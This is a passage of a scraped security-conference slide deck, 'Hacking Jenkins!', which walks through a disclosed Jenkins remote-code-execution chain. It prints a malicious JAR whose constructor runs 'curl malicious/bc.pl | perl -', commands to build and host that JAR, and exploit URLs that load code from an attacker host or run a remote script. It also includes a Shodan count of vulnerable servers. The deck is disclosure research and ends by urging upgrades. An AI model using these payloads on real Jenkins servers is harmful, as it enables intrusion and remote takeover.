HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"
![Page 82: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/82.jpg)
Import arbitrary JARBut how to get code execution?
![Page 83: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/83.jpg)
Dig deeper into @GrabWe start to review the Groovy implementation
![Page 84: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/84.jpg)
groovy.grape.GrapeIvy
![Page 85: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/85.jpg)
groovy.grape.GrapeIvy
![Page 86: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/86.jpg)
YesWe can poke the Constructor on any class!
![Page 87: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/87.jpg)
Chain all together
![Page 88: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/88.jpg)
Prepare the malicious JARpublic class Orange {
public Orange() {
try {
String payload = "curl malicious/bc.pl | perl -";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}}
![Page 89: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/89.jpg)
Prepare the malicious JAR$ javac Orange.java
$ mkdir -p META-INF/services/
$ echo Orange >META-INF/services/org.codehaus.groovy.plugins.Runners
$ find –type f
./Orange.java
./Orange.class
./META-INF/services/org.codehaus.groovy.plugins.Runners
$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[host]/tw/orange/poc/1/poc-1.jar
![Page 90: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/90.jpg)
Attacking remote Jenkins!
http://jenkins/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://evil/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;
![Page 91: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/91.jpg)
Demohttps://youtu.be/abuH-j-6-s0
![Page 92: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/92.jpg)
Survey on Shodan
• It is about 75000 Jenkins servers in the wild• $ cat versions | sort | uniq -c | sort -n | less
• 1933 - Jenkins: 2.107.3• 1577 - Jenkins: 2.60.3• 1559 - Jenkins: 2.107.2• 1348 - Jenkins: 2.89.4• 1263 - Jenkins: 2.155• 1095 - Jenkins: 2.153• 1012 - Jenkins: 2.107.1• 958 - Jenkins: 2.89.3
11750- Jenkins: 2.150.15473 - Jenkins: 2.138.34583 - Jenkins: 2.121.34534 - Jenkins: 2.138.23389 - Jenkins: 2.1562987 - Jenkins: 2.138.12530 - Jenkins: 2.121.12422 - Jenkins: 2.121.2
![Page 93: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/93.jpg)
Survey on Shodan
• We suppose all installed the suggested plugins
• Enable Overall/Read are vulnerable
• Disable Overall/Read
• Version > 2.138 can be chained with the ACL bypass vulnerability
• It's about 45000/75000 vulnerable Jenkins we can hack
![Page 94: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/94.jpg)
Evolution of the exploit
2019-01-08CVE-2019-1003000
Sandbox escape fixed(classLoader.parseClass)
2018-12-05
CVE-2018-1000861 ACL bypass fixed
2019-01-16
Release the blog Hacking Jenkins part-1
2019-01-28CVE-2019-1003005
Another path to reach the syntax validation fixed(GroovyShell.parse)
2019-02-19
Release the blog Hacking Jenkins part-2
and the RCE chain
@orange_8361
@orange_8361
@orange_8361
@0ang3el
@orange_8361
2019-03-06CVE-2019-1003029
Another sandbox escape in GroovyShell.parse fixed
@webpentest
![Page 95: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/95.jpg)
Evolution of the exploit
• Original entry (based on classLoader.parseClass)
• Meta programming is still required to obtain code execution
• New entry found by @0ang3el (based on GroovyShell.parse)
• A more universal entry
• The new entry is based on a higher level Groovy API
• With more features added compared to the original API, @webpentest
found an easier way to escape the sandbox!
![Page 96: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/96.jpg)
More reliable exploit chainhttp://jenkins/securityRealm/user/admin/descriptorByName/
org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.Secur
eGroovyScript/checkScript
?sandbox=true
&value=public class poc {
public poc() { "curl orange.tw/bc.pl | perl -".execute() }
}
CVE-2019-1003029 by @webpentestCVE-2019-1003005 by @0ang3elCVE-2018-1000861 by @orange_8361
![Page 97: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/97.jpg)
awesome-jenkins-rce-2019
![Page 98: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/98.jpg)
![Page 99: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/99.jpg)
![Page 100: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/100.jpg)
![Page 101: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/101.jpg)
![Page 102: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/102.jpg)
Upgrade your Jenkins ASAP